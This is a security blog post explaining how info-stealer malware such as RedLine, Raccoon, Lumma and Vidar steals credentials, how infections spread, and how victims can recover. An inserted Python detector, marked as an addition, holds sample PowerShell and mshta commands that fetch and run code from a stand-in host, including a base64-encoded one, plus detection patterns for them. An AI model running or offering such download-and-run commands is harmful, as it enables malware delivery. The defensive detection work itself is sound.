Info-Stealer Malware: RedLine, Raccoon, Lumma, and What They Actually Do

Published: 24 April 2026 · 9 min read · By ScanTotal Security Team
Last reviewed: 4 May 2026 by Kumari Rajapaksha — Founder, ScanTotal

There's a category of malware that doesn't announce itself. It doesn't encrypt your files, it doesn't pop up ransom notes, it doesn't slow your machine down to a crawl. It runs for about thirty seconds, uploads a bundle of data to a server somewhere, and quits. Two weeks later, your email is being used to reset somebody else's bank password, or your Steam library is gone, or your crypto wallet is empty — and you have no idea when it started.

That category is called an info-stealer, and in 2026 it's the most common malware people actually encounter. It's not the flashiest threat. It's just the one most likely to hit you.

This post walks through what info-stealers do, the biggest families circulating right now, how people get infected, and what to do if you think a machine of yours has been hit.

[Figure: Info-stealer infection chain. A four-step horizontal flow: delivery via cracked software or fake installer, execution by the user, collection of saved credentials and wallets, and exfiltration to attacker servers — typically within one minute. Steps: 1 Delivery (cracked software, malicious search ad, fake CAPTCHA); 2 Execute (user runs the file or pastes the PowerShell command); 3 Collect (read browser passwords, cookies, crypto wallets, tokens); 4 Exfiltrate (bundle as "log", upload to attacker, delete tracks). Timeline: ~30 sec end to end.]
An info-stealer's whole job is steps 3 and 4 — read everything sensitive on the machine, ship it to an attacker server, and exit. The whole cycle typically completes faster than the victim notices anything is wrong.

What info-stealers are (and aren't)

An info-stealer is malware whose entire purpose is to take data and leave. A single stealer run typically does something like this:

  1. Executes on the victim's machine after they open a malicious file or paste a command.
  2. Reads every installed browser's saved password store, cookie jar, autofill data, and history.
  3. Reads common crypto wallet files (Exodus, Electrum, MetaMask extension data, etc.).
  4. Reads tokens for Discord, Steam, Telegram, and similar apps.
  5. Takes a screenshot of the desktop.
  6. Bundles everything into a ZIP or similar archive — this is called a "log".
  7. Uploads the log to the attacker's server.
  8. Exits, often deleting its own files.

The whole process usually takes less than a minute. Unlike ransomware, the malware wants to stay undetected — the longer the victim doesn't notice, the more value the stolen session tokens retain. There's no ransom note because there's no negotiation. The data is already gone.

Logs get sold on criminal marketplaces within hours. A single log might go for a dollar or two. The buyer isn't the person who infected you — they bought access to your digital life from somebody else who did. That separation between infection and exploitation is why the gap between infection and visible consequence can be weeks or months.

The dominant families in 2026

Info-stealers operate mostly as Malware-as-a-Service: the developers rent their malware to affiliates who run the actual campaigns. That model means any given family has dozens of active operators at any moment, which is why these names have stayed prominent even as individual campaigns come and go.

RedLine

First seen: 2020 · Primary target: Windows · Distribution: MaaS

Probably the most widely distributed stealer of the last five years. Written in .NET, sold via Telegram channels, and notorious for being absurdly easy to operate. RedLine harvests browser credentials, cookies, autofill data, crypto wallets, and Discord/Telegram sessions. Typically arrives via fake cracked software, fake installers advertised on YouTube, or attachments in phishing emails. Its stealer logs have been found in practically every criminal marketplace since 2021.

Raccoon Stealer

First seen: 2019 · Primary target: Windows · Distribution: MaaS (v2 active)

Raccoon had a public takedown in 2022 when its main operator was arrested, but a second version appeared within months and has been active since. Focuses on browser credentials and crypto wallets with a particular emphasis on Chromium-based browsers. Commonly bundled inside fake installers for productivity tools — PDF readers, archive utilities, video players — that users search for when avoiding official downloads.

Lumma Stealer

First seen: 2022 · Primary target: Windows · Distribution: MaaS

One of the fastest-growing stealers in 2024-2026. Notable for being deliberately engineered to evade detection and for its support for grabbing session tokens from a long list of applications, not just browsers. Often delivered through fake CAPTCHA pages — a growing trend in 2026 — that instruct users to open Windows Run and paste a command, which pulls down and executes the stealer in a single step.

Vidar

First seen: 2018 · Primary target: Windows · Distribution: MaaS

A veteran of the space, Vidar is often used as a second-stage payload: another malware family infects the machine, then pulls in Vidar to do the actual data theft. It is particularly strong at harvesting data from 2FA and authentication apps that store their tokens in readable form. Known for using legitimate services (Telegram channels, Steam profile pages) to host its command-and-control configuration, which frustrates simple domain-blocking defences.

Other active families worth knowing by name: StealC (rising fast through 2025), Meduza, Rhadamanthys, and Atomic Stealer (the dominant macOS stealer, often bundled with fake video-conferencing or creative-tool installers). The total count of distinct stealer families is well over fifty; these are the ones most frequently seen in consumer-facing infections.

How people actually get infected

Info-stealer infections in 2026 almost always start with the victim executing the payload themselves. The delivery mechanisms that produce most of the volume:

Cracked software and game cheats

The single biggest infection vector for consumer machines. Somebody searches for "Photoshop 2026 crack" or "free Fortnite cheat", downloads an archive from a forum or random site, extracts it, and runs the installer. Half the time the cracked software doesn't even exist — the whole download was a wrapper around a stealer. This vector has been the same for over a decade, and it hasn't lost effectiveness.

Malicious ads in search results

Attackers buy search ads for popular software — "Notion", "OBS Studio", "WinRAR", "Discord download" — using domains that look convincing. The ad shows above the real result. Users click, land on a page that clones the real software site, and download an installer that installs the real software along with a stealer. The software actually works, so nothing seems wrong.

Fake CAPTCHA / fake error pages

A newer vector that exploded in 2024. Compromised websites show a fake "verify you're human" page that instructs the user: "Press Windows + R, press Ctrl + V, press Enter." What they've copied to the clipboard is a PowerShell command that downloads and runs a stealer. The user follows the instructions because the page looks like a normal security check. This vector has been linked to Lumma, Vidar, and StealC campaigns.
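A defender-side illustration, added here and not part of the original post: a small Python detector that walks constructed process-creation records (Sysmon-style fields; the PIDs, commands and example.invalid domains are made up) and flags the pasted download-and-run pattern described above, including the -EncodedCommand variant it has to decode before it can see the real payload. It assumes that a command pasted into Win+R shows up with explorer.exe as the parent process.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (not real telemetry); the -enc payload is built here.
_ENC = base64.b64encode('IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/c")'.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/verify)"'},
    {"pid": 4131, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell -nop -w h -enc " + _ENC},
    {"pid": 5210, "parent": "code.exe", "image": "powershell.exe",
     "cmd": 'powershell -NoProfile -Command "Get-ChildItem C:\\src"'},
    {"pid": 6002, "parent": "explorer.exe", "image": "mshta.exe",
     "cmd": "mshta http://example.invalid/captcha.hta"},
]
LAUNCHERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Download step: web cmdlets and their aliases, the .NET WebClient, or a bare URL.
FETCH = re.compile(r"\b(?:irm|iwr|invoke-(?:webrequest|restmethod)|downloadstring|downloadfile|net\.webclient)\b|https?://", re.I)
EXEC = re.compile(r"\b(?:iex|invoke-expression|mshta)\b", re.I)  # in-memory eval, or mshta pulling a remote HTA
# Evasion switches; PowerShell accepts any unambiguous prefix, so "-w h" means -WindowStyle Hidden.
HIDDEN = re.compile(r"-w[a-z]*\s+h[a-z]*\b|-nop[a-z]*\b|-ep\s+bypass|-noni[a-z]*\b", re.I)
ENCODED = re.compile(r"-e(?:c|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmd):
    # -EncodedCommand carries base64 of a UTF-16LE script; surface it so the scan sees the real payload.
    m = ENCODED.search(cmd)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event):
    """Alert dict when an event looks like a pasted download-and-run chain, else None."""
    if event["image"].lower() not in LAUNCHERS:
        return None
    decoded = decode_encoded_command(event["cmd"])
    cmd = event["cmd"] + " " + (decoded or "")  # scan the decoded payload as well as the wrapper
    indicators = ["encoded-command"] if decoded else []
    for name, pat in (("remote-fetch", FETCH), ("in-memory-exec", EXEC), ("evasion-flags", HIDDEN)):
        if pat.search(cmd):
            indicators.append(name)
    if event["parent"].lower() == "explorer.exe":  # Win+R launches show up as children of explorer.exe
        indicators.append("launched-from-shell")
    if not {"remote-fetch", "in-memory-exec"} <= set(indicators):
        return None  # a download or an eval on its own is ordinary admin activity
    severity = "high" if {"launched-from-shell", "evasion-flags"} & set(indicators) else "medium"
    return {"pid": event["pid"], "severity": severity, "indicators": indicators, "decoded": decoded}

def run_detection(events):
    return [alert for alert in map(analyze, events) if alert]
```

In a real deployment the records would come from EDR or Sysmon process telemetry, and the prefix-tolerant switch regex is deliberately loose, so baseline it against your own admin scripts before alerting on it.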

Phishing emails with attachments

Invoices, shipping notifications, job-offer documents. The attachment is usually a password-protected archive (to evade gateway scanning) with the password in the email body. Once extracted, the contents are an executable disguised as a PDF or Word document, often using unicode trickery in the filename. This vector is less common than cracked software for consumers but dominates business-targeted infections.

Trojanised YouTube tutorials

"How to get X for free" videos with a download link in the description. The link goes to a free file-host with a password-protected archive. This vector is disproportionately popular with younger users who encounter it while looking for free versions of paid tools.

What to do if you think you've been hit

The assumption to start from: every password saved in any browser on that machine is compromised. Every active session — email, banking, social media, crypto exchanges — is compromised. Every password-manager master password, if typed on that machine, is compromised.

The response, in order:

  1. Move to a different, clean device for the next steps. Don't try to change passwords from the machine that might still be infected.
  2. Change passwords on the high-value accounts first: primary email, password manager (master password), banking, crypto exchanges, any account that holds money or identity. Work through less critical accounts afterwards.
  3. Enable or rotate 2FA on every account that offers it. If you used SMS 2FA, switch to an authenticator app where possible — SMS codes can be intercepted through SIM-swap attacks once the attacker has your phone number.
  4. Sign out of all active sessions in each service's account settings. Stolen session cookies let an attacker skip the password entirely, so rotating passwords without signing out of sessions leaves a huge gap.
  5. Run a full scan on the infected machine with a reputable anti-malware product. Several good options exist — any of the major vendors will catch the common stealer families. If you want certainty, reinstall the operating system from scratch rather than trusting the cleanup.
  6. Notify your bank if banking credentials or sessions were exposed. They can monitor for fraudulent activity and flag the account. The sooner you tell them, the easier any disputed-transaction claim becomes.
  7. Monitor credit reports for the following weeks to months. Stolen identity data often gets used months after the original infection.

Prevention, honestly

Most real-world prevention comes down to four habits, none of which are novel:

  • Download software from official sources. Type the URL or use a bookmark — don't click the top search ad. This alone blocks the two biggest infection vectors.
  • Be sceptical of "paste this command" instructions from any web page, no matter how official it looks. Real error pages never tell you to run PowerShell commands.
  • Keep a current anti-malware product running. The built-in defender on modern Windows and macOS is genuinely competent against the common stealer families; it's not worth turning off for convenience.
  • Don't store passwords in your browser if you can avoid it. A dedicated password manager with a strong master password raises the bar meaningfully — stealers can't decrypt a properly configured password manager's vault without the master password, which you never type on random machines.

None of this is new. What's new is the sheer volume of stealer infections — AV-TEST and similar labs have reported stealer detections overtaking ransomware, banking trojans, and crypto-miners combined in recent years. The machinery has matured to industrial scale. The defences are the same ones your past self already knew about.
